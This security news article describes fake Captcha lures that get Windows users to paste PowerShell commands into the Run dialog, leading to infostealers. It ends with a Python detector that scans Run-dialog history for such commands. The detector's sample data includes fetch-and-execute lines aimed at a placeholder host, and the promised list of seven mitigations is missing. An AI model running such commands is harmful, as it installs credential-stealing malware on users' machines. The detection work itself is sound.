
Windows Passwords Are Under Attack — Do These 7 Things Now
Microsoft Windows is always a premier target for cybercriminal actors, and more often than not, passwords are front and center of their campaign payloads. Be it the pray and spray hackers employing automatic password hacking machines, state-sponsored advanced persistent threat groups targeting the enterprise, or even warnings from security researchers about the threat presented by Copilot AI for SharePoint, Windows passwords are the most valuable of low-hanging fruits. Now Trend Micro has confirmed how one particular password threat is making a determined effort to get hold of yours. Here are seven things you need to do to stop your organization being the next victim of the Captcha hackers.
The Completely Automated Public Turing test to tell Computers and Humans Apart, thankfully shortened to Captcha, is something that we have all encountered and all have much the same hatred for. Being asked to select squares containing images of bicycles or ticking a checkbox to prove we are not a robot (wouldn't a robot be able to do that?) are largely pointless at the best of times, and downright dangerous at the worst. If AI cannot solve a Captcha more often than not, then, frankly, we have nothing to fear from our robot overlords. What we do have to fear, however, are hackers using Captcha methods to initiate an infostealer malware infection chain that ultimately leads to password compromise.
The latest Trend Micro research takes a deep dive into the technical details behind what it refers to as 'a notable surge in fake Captcha cases.' As always, I recommend you go and read that report in full if it is the technical teardown that you are after. The TL;DR, however, is that this wave of fake Captcha attacks is tricking users into pasting malicious commands into the Windows Run dialog, with payloads executed in memory and often employing PowerShell. 'These attacks enable data exfiltration, credential theft, remote access, and loader deployment,' the Trend Micro researchers warned, 'via malware such as Lumma Stealer, Rhadamanthys, AsyncRAT, Emmental, and XWorm.'
Yes, Microsoft has just led a global operation to dismantle much of the Lumma Stealer network infrastructure. No, that doesn't mean you are now safe. As one player is disrupted, so others rise to fill the void. 'These campaigns abuse multiple legitimate platforms, including file-sharing services, content and search platforms, music repositories, URL redirectors and document hosts,' Trend Micro said, and those using Windows operating systems where minimal script execution restrictions are employed are most at risk.
Microsoft has recommended that 'customers always practice good computing habits online, including exercising caution when clicking on links to web pages, opening unknown files, or accepting file transfers,' as well as 'switching to Passkeys wherever possible and using authentication apps such as Microsoft Authenticator, which warn users about potential phishing attempts.'
The Trend Micro report, however, concludes that organizations should apply the following seven mitigations:
Of course, if you really care about your Windows passwords, I would also add that opening the Windows Run window by pressing Windows+R, pasting the clipboard's content in the run window using CTRL+V, and then pressing Enter to execute it, isn't the best response to a supposed Captcha text. Think smart and don't do that, OK?
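A triage sketch for the behaviour described above, added here as an example and not taken from the Trend Micro report or the original article: Windows keeps a history of commands entered in the Run dialog under the current user's RunMRU registry key, so that history can be checked for the PowerShell, remote-download and in-memory patterns these lures depend on. The rule set, the two-hit threshold and the sample entries are constructed assumptions to tune locally.

```python
import re

# Illustrative heuristics (assumptions, not vendor signatures) for Run-dialog commands.
RULES = [
    ("script host / system binary", re.compile(
        r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|curl|certutil|bitsadmin)(\.exe)?\b", re.I)),
    ("remote URL", re.compile(r"https?://", re.I)),
    ("hidden window", re.compile(r"\s-w(in\w*)?\s+hid", re.I)),
    ("encoded command", re.compile(r"\s-e(nc\w*|c)?\s", re.I)),
    ("in-memory execution", re.compile(
        r"\b(iex|invoke-expression|downloadstring|frombase64string)\b", re.I)),
]

# Constructed sample in RunMRU layout: values a, b, c... hold commands ending in "\1".
SAMPLE_RUNMRU = {
    "a": "cmd\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -c "iex (irm https://example.invalid/c)"\\1',
    "d": "mshta https://example.invalid/verify.hta\\1",
    "MRUList": "dcba",
}

def triage(values, threshold=2):
    """Return {value_name: [rule labels]} for entries matching >= threshold rules."""
    findings = {}
    for name, data in values.items():
        if name == "MRUList":            # ordering metadata, not a command
            continue
        cmd = data[:-2] if data.endswith("\\1") else data
        hits = [label for label, rx in RULES if rx.search(cmd)]
        if len(hits) >= threshold:       # a bare "cmd" or "powershell" stays below it
            findings[name] = hits
    return findings

def read_runmru():
    """Read the live Run-dialog history for the current user (Windows only)."""
    import winreg
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    values = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
        for i in range(winreg.QueryInfoKey(key)[1]):
            name, data, _type = winreg.EnumValue(key, i)
            values[name] = str(data)
    return values

if __name__ == "__main__":
    for name, hits in triage(SAMPLE_RUNMRU).items():
        print(name, SAMPLE_RUNMRU[name][:-2], hits)
```

On a Windows host, `triage(read_runmru())` applies the same rules to the logged-in user's real history; an empty result only means nothing in that history matched these rules.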
